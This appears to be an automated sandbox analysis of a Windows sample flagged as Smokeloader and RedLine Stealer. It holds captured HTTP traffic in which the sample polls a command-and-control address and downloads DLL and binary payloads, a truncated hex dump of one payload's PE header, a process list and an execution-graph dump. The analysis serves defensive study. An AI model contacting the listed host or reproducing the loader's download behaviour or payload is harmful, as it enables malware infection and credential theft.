                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:25.314899921 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:25 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=90
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:27.335062027 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:27.563453913 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:27 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=89
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:29.585211992 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:29.827352047 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:29 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=88
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:31.850446939 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:32.068552017 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:32.381088018 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:32.794883013 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:32 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=87
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:34.820627928 CEST 394 OUT GET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:35.065159082 CEST 203 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:34 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=86
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:38.116286039 CEST 393 OUT GET /soft/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: d
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:38.355118990 CEST 1236 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:38 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="dll";
                                                Content-Length: 242176
                                                Keep-Alive: timeout=5, max=85
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                Oct 8, 2024 04:24:38.857721090 CEST 393 OUT GET /soft/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: s
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:39.204221010 CEST 1236 IN HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:38 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="soft";
                                                Content-Length: 1502720
                                                Keep-Alive: timeout=5, max=84
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream



                                                Target ID:0
                                                Start time:22:24:01
                                                Start date:07/10/2024
                                                Path:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\nRGKqzVQRt.exe"
                                                Imagebase:0x400000
                                                File size:465'920 bytes
                                                MD5 hash:75C689774E5B58A3C4CED392928B6053
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:true

                                                Target ID:4
                                                Start time:22:24:04
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 732
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:22:24:04
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:22:24:05
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:22:24:06
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 792
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:22:24:07
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 528
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:22:24:08
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1016
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:19
                                                Start time:22:24:40
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1468
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:22
                                                Start time:22:24:43
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1292
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true


                                                  Execution Graph

                                                  Execution Coverage:2.6%
                                                  Dynamic/Decrypted Code Coverage:33.7%
                                                  Signature Coverage:13.6%
                                                  Total number of Nodes:1322
                                                  Total number of Limit Nodes:53
52766 409650 52766->52744 52771 40967c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52766->52771 52774 40930a 52770->52774 52773 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52771->52773 52772 409276 53287 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 52772->53287 52776 40969c 52773->52776 52774->52781 53288 40b040 27 API calls 3 library calls 52774->53288 52776->52684 52778 4096a5 52780 411337 25 API calls 52778->52780 52779->52684 52780->52744 52781->52753 52781->52778 52782->52677 52783->52686 52784->52688 52785->52691 52786->52670 53624 414c2b 52787->53624 52790 414d51 23 API calls __FrameHandler3::FrameUnwindToState 52790->52675 52791->52695 52792->52697 52793->52698 52795 40d8e3 GetStartupInfoW 52794->52795 52795->52703 52797 41eebe 52796->52797 52798 41ee8c 52796->52798 52797->52707 52803 418ee0 37 API calls 3 library calls 52798->52803 52800 41eeaf 52804 41eccf 47 API calls 4 library calls 52800->52804 52802->52707 52803->52800 52804->52797 53295 404150 52805->53295 52807 40a0b2 53304 4015c0 27 API calls 4 library calls 52807->53304 52809 40a0b9 53305 40c516 43 API calls 5 library calls 52809->53305 52811 40a0d3 53306 40abe0 74 API calls 5 library calls 52811->53306 52813 40a14d 53307 4015c0 27 API calls 4 library calls 52813->53307 52814 40a104 52814->52813 52815 404150 27 API calls 52814->52815 52815->52813 52817 40a17f 53308 40c516 43 API calls 5 library calls 52817->53308 52819 40a196 52820 40a2a8 52819->52820 52821 40a228 52819->52821 53311 40c289 RaiseException Concurrency::cancel_current_task 52820->53311 52823 40a248 _Yarn 52821->52823 52825 40a253 52821->52825 52826 40a234 52821->52826 52823->52714 52824 40a2ad 53312 4015c0 27 API calls 2 library calls 52824->53312 53310 4015c0 27 API calls 4 library calls 52825->53310 52826->52824 52829 40a23b 52826->52829 53309 4015c0 27 API calls 4 library calls 52829->53309 52830 40a241 52830->52823 52832 411337 25 API calls 52830->52832 
52833 40a2b7 52832->52833 52833->52714 52835 40b9fc 52834->52835 53316 40bf10 52835->53316 52837 404150 27 API calls 52838 40bbe4 52837->52838 52838->52722 52839 40ba65 52839->52837 52841 40ba10 52841->52839 53323 40b4e0 27 API calls 4 library calls 52841->53323 53325 414f0a GetSystemTimeAsFileTime 52842->53325 52844 40641f 53327 414dc4 52844->53327 52847 402460 27 API calls 52849 40645e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52847->52849 52848 402460 27 API calls 52875 4064c9 __FrameHandler3::FrameUnwindToState std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52848->52875 52849->52848 52849->52875 52852 40cfd1 27 API calls 52852->52875 52853 4068b1 53367 407310 52853->53367 52856 4068d8 53377 4022c0 52856->53377 52859 4068e8 53381 4021f0 52859->53381 52863 4068fc 52864 4069d1 52863->52864 52865 406904 52863->52865 53452 4075b0 39 API calls 2 library calls 52864->53452 52871 406974 52865->52871 52872 406917 52865->52872 52866 411337 25 API calls 52866->52875 52869 4069d6 52877 4022c0 27 API calls 52869->52877 52870 406865 Sleep 52870->52875 53447 4074a0 39 API calls 2 library calls 52871->53447 53442 407390 39 API calls 2 library calls 52872->53442 52875->52852 52875->52853 52875->52866 52875->52870 52879 402460 27 API calls 52875->52879 52883 40688a 52875->52883 52891 406871 52875->52891 52893 40685b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52875->52893 53330 414eda 52875->53330 53334 404450 52875->53334 53346 40b900 52875->53346 53351 401d20 52875->53351 53434 40d10c 6 API calls 52875->53434 53435 40d41e 28 API calls 52875->53435 53436 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 52875->53436 52876 40691c 52881 4022c0 27 API calls 52876->52881 52880 4069e6 52877->52880 52878 406979 52882 4022c0 27 API calls 52878->52882 52879->52875 52885 4021f0 25 API calls 52880->52885 52884 40692c 52881->52884 52886 406989 52882->52886 53440 40a800 27 API calls 52883->53440 53443 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 
52884->53443 52889 4069fa 52885->52889 53448 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52886->53448 52895 406ad0 52889->52895 52896 406a02 52889->52896 52891->52883 53437 4045e0 52891->53437 52892 406896 52899 4021f0 25 API calls 52892->52899 52893->52870 52894 406935 52900 4021f0 25 API calls 52894->52900 53461 407950 39 API calls 2 library calls 52895->53461 53453 407630 39 API calls 2 library calls 52896->53453 52897 406992 52903 4021f0 25 API calls 52897->52903 52905 40689e 52899->52905 52906 40693d 52900->52906 52904 40699a 52903->52904 53449 407530 39 API calls 2 library calls 52904->53449 52910 4021f0 25 API calls 52905->52910 53444 407420 39 API calls 2 library calls 52906->53444 52907 406a07 52917 4022c0 27 API calls 52907->52917 52908 406ad5 52915 4022c0 27 API calls 52908->52915 52913 4068a6 52910->52913 52912 40699f 52920 4022c0 27 API calls 52912->52920 53441 4016d0 CoUninitialize 52913->53441 52914 406942 52921 4022c0 27 API calls 52914->52921 52918 406ae5 52915->52918 52919 406a17 52917->52919 52928 4021f0 25 API calls 52918->52928 53454 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52919->53454 52924 4069af 52920->52924 52925 406952 52921->52925 52923 406a20 52927 4021f0 25 API calls 52923->52927 53450 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52924->53450 53445 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52925->53445 52931 406a28 52927->52931 52932 406af9 52928->52932 52930 40695b 52934 4021f0 25 API calls 52930->52934 53455 4076b0 39 API calls 2 library calls 52931->53455 52936 406bba 52932->52936 53462 4079d0 39 API calls 2 library calls 52932->53462 52933 4069b8 52937 4021f0 25 API calls 52933->52937 52938 406963 52934->52938 53470 407cf0 39 API calls 2 library calls 52936->53470 52942 4069c0 52937->52942 53446 40a800 27 API calls 52938->53446 52939 406a2d 52948 4022c0 27 API calls 52939->52948 53451 40a800 27 API calls 52942->53451 52944 406b06 52951 4022c0 27 API calls 52944->52951 
52945 406bc4 52952 4022c0 27 API calls 52945->52952 52947 40696f 52949 406f5a 52947->52949 53508 4021c0 27 API calls 52947->53508 52950 406a3d 52948->52950 53389 401670 52949->53389 53456 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52950->53456 52956 406b16 52951->52956 52957 406bd4 52952->52957 53463 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52956->53463 52965 4021f0 25 API calls 52957->52965 52958 406f6d 53393 408a70 52958->53393 52959 406a46 52962 4021f0 25 API calls 52959->52962 52967 406a4e 52962->52967 52963 406b1f 52964 4021f0 25 API calls 52963->52964 52968 406b27 52964->52968 52969 406be8 52965->52969 52966 406f76 52977 4022c0 27 API calls 52966->52977 53457 407730 39 API calls 2 library calls 52967->53457 53464 407a50 39 API calls 2 library calls 52968->53464 52972 406ccf 52969->52972 53471 407d70 39 API calls 2 library calls 52969->53471 53481 408110 39 API calls 2 library calls 52972->53481 52973 406a53 52981 4022c0 27 API calls 52973->52981 52975 406b2c 52984 4022c0 27 API calls 52975->52984 52980 406f89 52977->52980 52978 406cd9 52986 4022c0 27 API calls 52978->52986 52979 406bf5 52988 4022c0 27 API calls 52979->52988 53403 4089f0 52980->53403 52983 406a63 52981->52983 52992 4021f0 25 API calls 52983->52992 52987 406b3c 52984->52987 52985 406f94 52995 4022c0 27 API calls 52985->52995 52989 406ce9 52986->52989 53465 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52987->53465 52991 406c05 52988->52991 53003 4021f0 25 API calls 52989->53003 53472 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52991->53472 52997 406a77 52992->52997 52993 406b45 52998 4021f0 25 API calls 52993->52998 52996 406fa7 52995->52996 53413 408950 52996->53413 53001 406a98 52997->53001 53002 406a7b 52997->53002 53004 406b4d 52998->53004 52999 406c0e 53005 4021f0 25 API calls 52999->53005 53459 407840 39 API calls 2 library calls 53001->53459 53458 4077c0 39 API calls 2 library calls 53002->53458 53008 406cfd 53003->53008 53466 
407ad0 39 API calls 2 library calls 53004->53466 53010 406c16 53005->53010 53006 406fb2 53021 4022c0 27 API calls 53006->53021 53014 406d01 53008->53014 53015 406d7f 53008->53015 53473 407df0 39 API calls 2 library calls 53010->53473 53012 406a9d 53025 4022c0 27 API calls 53012->53025 53013 406a80 53027 4022c0 27 API calls 53013->53027 53482 4081a0 39 API calls 2 library calls 53014->53482 53488 408330 39 API calls 2 library calls 53015->53488 53016 406b52 53024 4022c0 27 API calls 53016->53024 53020 406c1b 53029 4022c0 27 API calls 53020->53029 53026 406fc5 53021->53026 53022 406d84 53035 4022c0 27 API calls 53022->53035 53023 406d06 53036 4022c0 27 API calls 53023->53036 53028 406b62 53024->53028 53030 406aad 53025->53030 53423 40ad00 53026->53423 53032 406a90 53027->53032 53043 4021f0 25 API calls 53028->53043 53033 406c2b 53029->53033 53045 4021f0 25 API calls 53030->53045 53507 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53032->53507 53474 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53033->53474 53041 406d94 53035->53041 53037 406d16 53036->53037 53483 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53037->53483 53054 4021f0 25 API calls 53041->53054 53049 406b76 53043->53049 53044 406c34 53050 4021f0 25 API calls 53044->53050 53051 406ac1 53045->53051 53046 406ff2 53431 40ae10 53046->53431 53047 406f41 53053 4021f0 25 API calls 53047->53053 53048 406d1f 53055 4021f0 25 API calls 53048->53055 53056 406b84 53049->53056 53057 406b7a 53049->53057 53058 406c3c 53050->53058 53051->52947 53460 4078d0 39 API calls 2 library calls 53051->53460 53053->52947 53060 406da8 53054->53060 53061 406d27 53055->53061 53468 407be0 39 API calls 2 library calls 53056->53468 53467 407b60 39 API calls 2 library calls 53057->53467 53475 407e70 39 API calls 2 library calls 53058->53475 53067 406e2a 53060->53067 53068 406dac 53060->53068 53484 408220 39 API calls 2 library calls 53061->53484 53066 40ad60 27 API calls 53072 40701f 53066->53072 
53495 408540 39 API calls 2 library calls 53067->53495 53489 4083c0 39 API calls 2 library calls 53068->53489 53070 406c41 53081 4022c0 27 API calls 53070->53081 53071 406b89 53082 4022c0 27 API calls 53071->53082 53076 40ae10 27 API calls 53072->53076 53075 406d2c 53084 4022c0 27 API calls 53075->53084 53077 407034 53076->53077 53080 40ad60 27 API calls 53077->53080 53078 406e2f 53088 4022c0 27 API calls 53078->53088 53079 406db1 53089 4022c0 27 API calls 53079->53089 53083 40704c 53080->53083 53085 406c51 53081->53085 53086 406b99 53082->53086 53087 4021f0 25 API calls 53083->53087 53090 406d3c 53084->53090 53476 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53085->53476 53098 4021f0 25 API calls 53086->53098 53092 40705a 53087->53092 53093 406e3f 53088->53093 53094 406dc1 53089->53094 53485 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53090->53485 53099 4021f0 25 API calls 53092->53099 53109 4021f0 25 API calls 53093->53109 53490 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53094->53490 53096 406c5a 53097 4021f0 25 API calls 53096->53097 53102 406c62 53097->53102 53103 406bad 53098->53103 53104 407065 53099->53104 53101 406d45 53106 4021f0 25 API calls 53101->53106 53477 407ef0 39 API calls 2 library calls 53102->53477 53103->52947 53469 407c70 39 API calls 2 library calls 53103->53469 53108 4021f0 25 API calls 53104->53108 53105 406dca 53110 4021f0 25 API calls 53105->53110 53111 406d4d 53106->53111 53114 407070 53108->53114 53115 406e53 53109->53115 53116 406dd2 53110->53116 53486 4082b0 39 API calls 2 library calls 53111->53486 53112 406c67 53128 4022c0 27 API calls 53112->53128 53119 4021f0 25 API calls 53114->53119 53120 406e57 53115->53120 53121 406eaa 53115->53121 53491 408440 39 API calls 2 library calls 53116->53491 53118 406d52 53131 4022c0 27 API calls 53118->53131 53125 40707b 53119->53125 53496 4085d0 39 API calls 2 library calls 53120->53496 53501 408750 39 API calls 2 library calls 53121->53501 53123 406dd7 
53134 4022c0 27 API calls 53123->53134 53130 4021f0 25 API calls 53125->53130 53127 406e5c 53137 4022c0 27 API calls 53127->53137 53132 406c77 53128->53132 53129 406eaf 53140 4022c0 27 API calls 53129->53140 53133 407086 53130->53133 53135 406d62 53131->53135 53145 4021f0 25 API calls 53132->53145 53136 4021f0 25 API calls 53133->53136 53138 406de7 53134->53138 53487 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53135->53487 53141 407091 53136->53141 53142 406e6c 53137->53142 53492 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53138->53492 53146 406ebf 53140->53146 53147 4021f0 25 API calls 53141->53147 53497 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53142->53497 53144 406d6b 53151 4021f0 25 API calls 53144->53151 53152 406c8b 53145->53152 53161 4021f0 25 API calls 53146->53161 53148 40709c 53147->53148 53153 4021f0 25 API calls 53148->53153 53150 406df0 53155 4021f0 25 API calls 53150->53155 53151->52947 53156 406c94 53152->53156 53478 407f80 39 API calls 2 library calls 53152->53478 53197 4070ab 53153->53197 53154 406e75 53158 4021f0 25 API calls 53154->53158 53159 406df8 53155->53159 53479 408000 39 API calls 2 library calls 53156->53479 53163 406e7d 53158->53163 53493 4084c0 39 API calls 2 library calls 53159->53493 53165 406ed3 53161->53165 53162 406c9e 53171 4022c0 27 API calls 53162->53171 53498 408650 39 API calls 2 library calls 53163->53498 53165->52947 53502 4087d0 39 API calls 2 library calls 53165->53502 53167 406dfd 53173 4022c0 27 API calls 53167->53173 53169 406e82 53175 4022c0 27 API calls 53169->53175 53170 406edc 53177 4022c0 27 API calls 53170->53177 53172 406cae 53171->53172 53182 4021f0 25 API calls 53172->53182 53176 406e0d 53173->53176 53174 40710a Sleep 53174->53197 53178 406e92 53175->53178 53494 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53176->53494 53181 406eec 53177->53181 53499 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53178->53499 53180 406e16 53185 4021f0 25 
